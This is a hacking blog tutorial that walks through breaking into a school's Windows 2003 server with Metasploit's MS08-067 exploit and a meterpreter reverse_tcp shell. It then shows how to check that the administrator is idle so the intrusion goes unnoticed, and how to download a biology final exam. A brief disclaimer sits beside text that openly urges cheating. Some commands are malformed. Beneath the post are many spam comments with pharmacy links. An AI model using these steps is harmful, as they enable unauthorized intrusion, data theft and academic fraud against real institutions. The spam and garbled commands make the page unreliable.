Hack Like ProHackingMaster Hack

How to Hack Your School’s Server to Download Final Exam Answers

128

Welcome back, my fledgling hackers!

If you’re like most aspiring hackers, at one time or another you’ve probably spent too much time playing Call of Duty and not enough time preparing for your final exams.

So for today, we’ll look at how to break into your school’s server to download the final exam file with the answers onto your computer. Just think of the benefits to your academic record, your Call of Duty skills, and your popularity when you show up at school with the final exams days ahead of the finals!

This hack uses Metasploit along with its meterpreter, so let’s get after those finals and fire up our Metasploit in BackTrack!

WARNING (Disclaimer):

Of course, this is for demonstration/entertainment purposes only. Please do not break into your school’s server and steal exams as it’s illegal and very likely will get you kicked out of school. This is just an example of the security risks that high schools and colleges pose from using outdated systems with known vulnerabilities.

Step 1Find That Proper Exploit

Those of you with experience with Metasploit, or have followed my previous Metasploit tutorials, know that one of my favorite exploits is the RPC buffer overflow that works so well in Windows XP, Server 2003, and sometimes even in Vista and Server 2008.

In our case here, our school is running a Windows 2003 Server that stores all the department’s exams and records. So, let’s use the /exploit/windows/smb/ms08_067_netapi. To find it, type:

  • msf > search ms08

Metasploit displays all the exploits with ms08 in it. The one we want is second from the bottom. We can highlight it and cut/paste it into our command:

  • msf > use /exploit/windows/smb/ms08_067_netapi

Step 2Set the Payload

Now we need to set our payload. In this case, we’ll use the meterpreter for Windows or /windows/meterpreter/reverse_tcp.

  • msf > set payload /windows/meterpreter/reverse_tcp

Let’s take a look next at the options that we need for this exploit/payload combination by typing:

  • msf > show options

Step 3Set the Options

Now we can see that we need to set the RHOST and the LHOST.

  • msf >set LHOST 192.168.1.114
  • msf >set RHOST192.168.1.108

Step 4Exploit That Server!

Now all we to need do is exploit and get a meterpreter prompt on that school server where we can do our dirty work.

  • msf > exploit

Step 5Check to See if the Admin Is Using the System

We should now have a meterpreter shell on the school’s server. Before we can even consider to download files from that server, we want to make certain that no one is on that system where we might get detected. We can run the idletime command to see whether anyone has used the system recently.

  • meterpreter >idletime

As you can see, the last time someone did something on the system was just over 3 minutes ago. To be safe, let’s wait a bit and hope the administrator goes home for night. The last thing we want is for the administrator to detect our attempt to download those final exams!

Once we’re safe and the system has been idle for awhile, our next step is to find those exams. Meterpreter uses standard Linux commands like ls, cd, pwd, and others, so let’s type lpwd (both pwd and lpwd will work).

Meterpreter responds with the / symbol indicating that we’re in the root directory.

Step 6Find the Final Exams

We can then type ls to get a listing of all the directories and files in the root directory. We can see a directory named ConcordUniversity. That’s probably where the exams are! Let’s change directories to Concord University:

  • meterpreter c:\\ConcordUniversity

Note that we need to use a double \\ to navigate to this directory. This is necessary and critical.

Now we’re in ConcordUniversity, we can get a directory listing by typing:

  • meterprter > ls

We can see we have folders for Anthropology, Biology, Chemistry, and Economics. Since we’re looking for the Biology final, let’s navigate to the Biology directory.

  • meterpreter > cd biology

Voilà! There’s the final exam for our biology class.

Step 7Download the Final

Meterpreter has a built-in download feature, so all we need to do is type:

  • meterpreter > download C:\\biology\exams\FinalExam

We can see that Metasploit has downloaded the FinalExam to our computer! Please note again that we do need to use the double backslash (\\) in denoting the directory of the file we want to download.

When we navigate back to our BackTrack system, we can see that the biology final is in our root directory. Yeah!

Now we are guaranteed a 95% (don’t get a 100%, the instructor will be suspicious). If you have any questions, feel free to ask in the comments, or head on over to the My Whatsapp Group if you have questions on hacking topics unrelated to this article.

Lovepreet Singh
CEO & FOUNDER OF" FIVE RIVERS INCORPORATION - LEADING SOFTWARE & CYBER SECURITY DEVELOPMENT COMPANY" || CERTIFIED ETHICAL HACKER || FUTURE TRILLIONAIRE || FUTURISTIC || "DULL SCHOOL STUDENT" || (Follow this link to message me on WhatsApp: https://wa.me/13018426470)

What is an API, Exactly?

Previous article

Bash (Shell) Scripting for Beginners

Next article

You may also like

128 Comments

  1. Tadacip 20mg Online Review [url=http://levipill.com]levitra coupon free trial[/url] Cephalexin Oral Suspension Dosage Dog Viagra Nebenwirkungen De

  2. Thanks foг sharing your tһoughts on situs download laɡu.

    Ɍegards http://php.hicn.com.cn/comment/html/?107154.html

  3. I vjsit dɑily ѕⲟme sitеs and sites to read articles, excеpt this wеblog offers qualitү baseԀ posts. http://utea.cc/comment/html/?67619.html

  4. Have you ever considered about including a little bit more than just your
    articles? I mean, what you say is fundamental and everything.
    However just imagine if you added some great visuals or videos to give your posts more,
    “pop”! Your content is excellent but with images and clips, this website could certainly be one of the greatest in its field.
    Wonderful blog!

  5. Just desire to say your article is as astonishing.
    The clearness in your post is just nice and i could assume you’re an expert
    on this subject. Well with your permission allow me to grab your feed to keep
    updated with forthcoming post. Thanks a million and please continue
    the enjoyable work.

  6. Photo Auto Liker, Status Liker, Autolike, Auto Like, Working Auto Liker, Increase Likes, Status Auto Liker, Autoliker, auto like, ZFN Liker, Auto Liker, auto liker, Autoliker, autolike, Photo Liker, autoliker, Autolike International

  7. Yoս reallly make it seem so easy with your presentation but I find tһis matter to
    be actually something that I tһink I would never understand.
    It seens ttoo complicated and extremely brоad
    fοr me. I’m looking forward for your next post, I’ll try
    to get the hang of it! http://www.b-maple.com/comment/html/?44425.html

  8. Wе’re a gagglе oof volunteers and startіng a brand new
    scheme in ouur community. Your site provided us with helρful information to work on. You’ve performed an impressive аctivity
    and our whole neighborhooⅾ will bе grateful to you. http://www.itosm.com/cn/board_nLoq17/1319234

  9. Sildenafil Pas Cher 120 Mg Vente Cialis Generique Ligne [url=http://cheapestcial.com]cialis for sale[/url] Kamagra Yan Etkileri Where Can I Buy Cipro Xr

  10. Remarkable things here. I am very happy to look your article.
    Thank you so much and I am looking forward to contact you.
    Will you please drop me a e-mail?

  11. whoah this weblog is wonderful i like studying your posts.
    Stay up the good work! You already know, a lot of individuals are looking round for this information,
    you could aid them greatly.

  12. When I originally left a comment I seem to have clicked the -Notify me when new comments are added- checkbox and
    now whenever a comment is added I get four emails with the same comment.
    There has to be a way you are able to remove me from that service?

    Many thanks!

  13. Spot on with this write-up, I absolutely believe that this web site
    needs a great deal more attention. I’ll probably be returning to see more,
    thanks for the advice!

  14. Prix Stromectol 20mg Free Porn Get Vagera Propecia Testicular Atrophy [url=http://sildenaf100mg.com]viagra online[/url] Zithromax For Sale Uk

  15. Wonderful post however , I was wondering if you could write a litte more on this topic?

    I’d be very thankful if you could elaborate a little bit more.

    Thanks!

  16. Yes! Finally something about gamefly free trial.

  17. I have learn some excellent stuff here. Definitely worth
    bookmarking for revisiting. I wonder how so much effort you set to make such a wonderful informative site.

  18. Levitra Effetto Ritardante [url=http://genericvia.com]viagra[/url] Cialis Pro Discovering Amoxicillin Propecia Bei Kinderwunsch

  19. Hey there! This is my first visit to your blog!

    We are a team of volunteers and starting a new initiative in a community in the same
    niche. Your blog provided us valuable information to work on. You have done a outstanding job!

  20. Howdy great blog! Does running a blog similar to this take a lot of work?
    I’ve very little expertise in coding however I had been hoping to start
    my own blog in the near future. Anyhow, if you have any suggestions or techniques for new blog owners please share.
    I understand this is off subject however I just wanted to ask.

    Many thanks!

  21. With havin so much content and articles do you ever run into any issues of plagorism or copyright infringement?
    My website has a lot of completely unique content I’ve either written myself
    or outsourced but it seems a lot of it is popping it up all over the internet without my agreement.
    Do you know any methods to help reduce content from being ripped
    off? I’d certainly appreciate it.

  22. Hi, I do think this is an excellent web site. I stumbledupon it 😉 I
    may come back once again since i have bookmarked
    it. Money and freedom is the greatest way to change, may you be rich and continue to guide
    others.

  23. Great goods from you, man. I have have in mind your stuff prior to and you are just too magnificent.
    I actually like what you’ve got here, really like what you are
    saying and the best way by which you are saying it.
    You make it entertaining and you still take care of to stay it sensible.

    I cant wait to learn far more from you. That is really a wonderful website.

  24. Have you ever considered publishing an ebook or guest authoring
    on other sites? I have a blog centered on the same ideas you discuss and would really like to have you share some stories/information. I know my readers would enjoy your work.
    If you are even remotely interested, feel free to shoot me an email.

  25. I need to to thank you for this fantastic read!! I absolutely loved every bit of it.
    I have you bookmarked to look at new things you post…

  26. Helpful info. Lucky me I found your site unintentionally, and
    I am surprised why this coincidence did not came
    about earlier! I bookmarked it.

  27. Wow that was strange. I just wrote an really long comment but after I
    clicked submit my comment didn’t appear. Grrrr…
    well I’m not writing all that over again. Regardless, just wanted to say great blog!

  28. You actually make it seem really easy together with your presentation but I in finding
    this topic to be really something which I believe I might by no means
    understand. It seems too complex and very vast for
    me. I’m having a look forward in your next put up, I will attempt to get the hold of it!

Leave a reply

Your email address will not be published. Required fields are marked *